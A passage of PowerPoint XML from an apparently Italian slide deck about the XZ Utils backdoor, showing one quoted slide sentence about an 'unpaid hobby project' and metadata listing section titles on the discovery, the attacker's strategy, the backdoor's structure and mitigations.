                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>It’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> good to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> in mind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unpaid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> hobby project”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128879252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Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Slides>100</Slides>
  <Notes>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100</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="101" baseType="lpstr">
      <vt:lpstr>PortalVTI</vt:lpstr>
      <vt:lpstr>XZ UtilS Backdoor</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr>  sommario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La strategia di jia tan</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi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revision>1562</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-20T19:57:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-26T21:17:37Z</dcterms:modified>
</cp:coreProperties>
</file>